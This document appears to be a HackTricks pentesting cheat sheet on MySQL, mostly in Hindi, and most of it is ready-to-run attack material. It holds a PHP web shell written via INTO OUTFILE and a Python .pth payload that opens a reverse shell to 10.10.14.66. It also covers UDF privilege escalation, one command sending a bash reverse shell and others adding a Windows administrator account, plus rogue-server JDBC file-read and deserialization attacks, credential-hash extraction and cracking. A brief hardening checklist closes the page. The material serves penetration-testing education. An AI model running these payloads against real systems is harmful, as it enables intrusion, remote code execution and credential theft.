3306 - Pentesting Mysql

Reading time: 19 minutes

बुनियादी जानकारी

MySQL को एक open source Relational Database Management System (RDBMS) के रूप में वर्णित किया जा सकता है जो नि:शुल्क उपलब्ध है। यह Structured Query Language (SQL) पर चलता है, जो डेटाबेस के प्रबंधन और हेरफेर की सुविधा प्रदान करता है।

डिफ़ॉल्ट पोर्ट: 3306

3306/tcp open  mysql

कनेक्ट

स्थानीय

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

रिमोट

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

External Enumeration

कुछ enumeration actions के लिए मान्य credentials आवश्यक होते हैं।

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

कोई भी बाइनरी डेटा लिखें

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL कमांड्स

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL अनुमतियों की सूची

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

You can see in the docs the meaning of each privilege: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (site-specific configuration hooks)

क्लासिक INTO OUTFILE primitive का दुरुपयोग करके उन लक्ष्यों पर जिनपर बाद में Python scripts चलती हैं, arbitrary code execution प्राप्त करना संभव है।

1. INTO OUTFILE का उपयोग करके किसी भी directory में एक कस्टम .pth फ़ाइल डालें जो site.py द्वारा स्वचालित रूप से लोड होती है (उदा. .../lib/python3.10/site-packages/)।
2. .pth फ़ाइल में एक single line हो सकती है जो import से शुरू होती है और उसके बाद arbitrary Python code आता है — यह प्रत्येक बार interpreter शुरू होने पर executed होगा।
3. जब interpreter को किसी CGI script के माध्यम से implicitly execute किया जाता है (उदा. /cgi-bin/ml-draw.py जिसमें shebang #!/bin/python है) तो payload वेब-सर्वर प्रक्रिया के समान privileges के साथ executed होगा (FortiWeb ने इसे root के रूप में चलाया → full pre-auth RCE)।

Example .pth payload (single line, final SQL payload में कोई spaces शामिल नहीं हो सकते, इसलिए hex/UNHEX() या string concatenation की आवश्यकता हो सकती है):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

एक UNION query के माध्यम से फ़ाइल तैयार करने का उदाहरण (स्पेस कैरेक्टर्स को /**/ से बदला गया है ताकि sscanf("%128s") space filter को बायपास किया जा सके और कुल लंबाई ≤128 bytes बनी रहे):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

महत्वपूर्ण सीमाएँ और बायपास:

• INTO OUTFILE मौजूदा फ़ाइलों को अधिलेखित नहीं कर सकता; नया फ़ाइलनाम चुनें.
• फ़ाइल पथ MySQL’s CWD के सापेक्ष हल किया जाता है, इसलिए ../../ से prefix करने पर पथ छोटा करने और absolute-path प्रतिबंधों को बायपास करने में मदद मिलती है.
• अगर attacker इनपुट %128s (या इसी तरह) से एक्सट्रैक्ट किया जाता है तो कोई भी space payload को truncate कर देगा; spaces की जगह MySQL comment sequences /**/ या /*!*/ का उपयोग करें.
• Query चलाने वाला MySQL user को FILE privilege चाहिए, लेकिन कई appliances (उदा. FortiWeb) में service root के रूप में चलती है, जिससे लगभग हर जगह write access मिल जाता है.

.pth ड्रॉप करने के बाद, किसी भी CGI को जो python interpreter द्वारा handle किया जाता है, बस request करें ताकि code execution मिल सके:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Python process स्वचालित रूप से दुर्भावनापूर्ण .pth import करेगा और shell payload execute करेगा।

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL क्लाइंट द्वारा मनमानी फ़ाइल पढ़ना

दरअसल, जब आप load data local into a table की कोशिश करते हैं, तो MySQL या MariaDB सर्वर किसी फ़ाइल की सामग्री को पढ़ने के लिए client से अनुरोध करता है और वह सामग्री भेजने को कहता है। यदि आप किसी mysql client को छेड़छाड़ करके उसे अपने ही MySQL server से कनेक्ट करवा सकें, तो आप मनमानी फ़ाइलें पढ़ सकते हैं।
कृपया ध्यान दें कि यह व्यवहार निम्न के साथ होता है:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(ध्यान दें "local" शब्द)
क्योंकि बिना "local" के आप पा सकते हैं:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server
इस पेपर में आप हमले का पूरा विवरण और इसे RCE तक विस्तारित करने का तरीका देख सकते हैं: https://paper.seebug.org/1113/
यहाँ आप हमले का एक अवलोकन पा सकते हैं: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql उपयोगकर्ता

यह बहुत दिलचस्प होगा अगर mysql root के रूप में चल रहा हो:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

mysqld.cnf के खतरनाक सेटिंग्स

MySQL सेवाओं के कॉन्फ़िगरेशन में, इसके संचालन और सुरक्षा उपायों को परिभाषित करने के लिए विभिन्न सेटिंग्स उपयोग की जाती हैं:

• The user setting is utilized for designating the user under which the MySQL service will be executed.
• password is applied for establishing the password associated with the MySQL user.
• admin_address specifies the IP address that listens for TCP/IP connections on the administrative network interface.
• The debug variable is indicative of the present debugging configurations, including sensitive information within logs.
• sql_warnings manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
• With secure_file_priv, the scope of data import and export operations is constrained to enhance security.

Privilege escalation

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

यदि mysql server is running as root (या कोई अन्य अधिक विशेषाधिकार प्राप्त उपयोगकर्ता) तो आप इसे कमांड्स execute करने के लिए मजबूर कर सकते हैं। इसके लिए आपको user defined functions का उपयोग करना होगा। और एक user defined function बनाने के लिए आपको उस OS के लिए एक library चाहिए होगा जिस पर mysql चल रहा है।

इस्तेमाल करने के लिए malicious library sqlmap और metasploit के अंदर मिल सकती है — इसे खोजने के लिए locate "*lib_mysqludf_sys*" चलाएँ। .so फाइलें linux libraries हैं और .dll फाइलें Windows वाली हैं, अपनी जरूरत के हिसाब से चुनें।

यदि आपके पास वे libraries नहीं हैं, तो आप या तो उन्हें look for them, या इस linux C code को डाउनलोड करके compile it inside the linux vulnerable machine:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

अब जब आपके पास लाइब्रेरी है, तो Mysql में एक privileged user (root?) के रूप में लॉगिन करें और अगले चरणों का पालन करें:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Windows tip: create directories with NTFS ADS from SQL

NTFS पर आप alternate data stream का उपयोग करके directory creation को मजबूर कर सकते हैं, भले ही केवल एक file write primitive मौजूद हो। अगर classic UDF chain plugin directory की उम्मीद करता है लेकिन वह मौजूद नहीं है और @@plugin_dir अज्ञात है या लॉक किया गया है, तो आप पहले इसे ::$INDEX_ALLOCATION से बना सकते हैं:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

यह सीमित SELECT ... INTO OUTFILE को Windows स्टैक्स पर UDF drops के लिए आवश्यक फ़ोल्डर संरचना तैयार करके एक अधिक पूर्ण प्रिमिटिव में बदल देता है।

Extracting MySQL credentials from files

फाइल /etc/mysql/debian.cnf के भीतर आप उपयोगकर्ता debian-sys-maint का सादा-पाठ पासवर्ड पा सकते हैं।

cat /etc/mysql/debian.cnf

आप use these credentials to login in the mysql database.

फ़ाइल के अंदर: /var/lib/mysql/mysql/user.MYD आप all the hashes of the MySQL users (वे जिन्हें आप mysql.user के अंदर से डेटाबेस में निकाल सकते हैं).

आप इन्हें निकाल सकते हैं:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

लॉगिंग सक्षम करना

आप mysql queries का लॉग /etc/mysql/my.cnf में निम्नलिखित लाइनों पर कॉमेंट हटाकर सक्षम कर सकते हैं:

उपयोगी फाइलें

Configuration Files

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Command History
• ~/.mysql.history
• Log Files
• connections.log
• update.log
• common.log

डिफ़ॉल्ट MySQL Database/Tables

HackTricks Automatic Commands

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023-2025 हाइलाइट्स (नया)

JDBC propertiesTransform deserialization (CVE-2023-21971)

From Connector/J <= 8.0.32 एक हमलावर जो JDBC URL को प्रभावित कर सकता है (उदाहरण के लिए third-party software जो एक connection string मांगता है) propertiesTransform parameter के माध्यम से client साइड पर arbitrary classes को लोड करने का अनुरोध कर सकता है। यदि class-path पर मौजूद कोई gadget लोड करने योग्य है तो इससे remote code execution in the context of the JDBC client होता है (pre-auth, क्योंकि किसी वैध क्रेडेंशियल की आवश्यकता नहीं होती)। एक न्यूनतम PoC इस तरह दिखता है:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Running Evil.class can be as easy as producing it on the class-path of the vulnerable application or letting a rogue MySQL server send a malicious serialized object. The issue was fixed in Connector/J 8.0.33 – upgrade the driver or explicitly set propertiesTransform on an allow-list. (विस्तार के लिए Snyk write-up देखें)

Rogue / Fake MySQL server द्वारा JDBC clients पर हमले

कुछ open-source tools आंशिक MySQL protocol को implement करते हैं ताकि बाहरी कनेक्शन करने वाले JDBC clients पर हमला किया जा सके:

• mysql-fake-server (Java, file read और deserialization exploits का समर्थन करता है)
• rogue_mysql_server (Python, समान क्षमताएँ)

सामान्य हमला मार्ग:

1. लक्षित एप्लिकेशन mysql-connector-j को allowLoadLocalInfile=true या autoDeserialize=true के साथ लोड करती है।
2. हमलावर DNS / host entry नियंत्रित करता है ताकि DB का hostname उनके नियंत्रण वाली मशीन पर resolve हो जाए।
3. Malicious server तैयार किए गए packets के साथ जवाब देता है जो LOCAL INFILE के जरिए arbitrary file read या Java deserialization → RCE को ट्रिगर करते हैं।

नकली सर्वर (Java) शुरू करने के लिए उदाहरण one-liner:

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

फिर विक्टिम एप्लिकेशन को jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true की ओर इंगित करें और फ़ाइल का नाम base64 में एन्कोड करके username फ़ील्ड में डालकर /etc/passwd पढ़ें (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

caching_sha2_password हैशेस क्रैक करना

MySQL ≥ 8.0 पासवर्ड हैशेस को $mysql-sha2$ (SHA-256) के रूप में स्टोर करता है। Hashcat (mode 21100) और John-the-Ripper (--format=mysql-sha2) दोनों 2023 से ऑफ़लाइन क्रैकिंग का समर्थन करते हैं। authentication_string कॉलम को डंप करें और इसे सीधे फ़ीड करें:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

हार्डनिंग चेकलिस्ट (2025)

• Set LOCAL_INFILE=0 and --secure-file-priv=/var/empty ज्यादातर file-read/write primitives को रोकने के लिए। • एप्लिकेशन अकाउंट्स से FILE privilege हटाएँ। • Connector/J पर allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (empty) सेट करें। • अनुपयोग किए गए authentication plugins को अक्षम करें और TLS आवश्यक करें (require_secure_transport = ON)। • CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL और अचानक SET GLOBAL स्टेटमेंट्स के लिए मॉनिटर करें।

संदर्भ

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)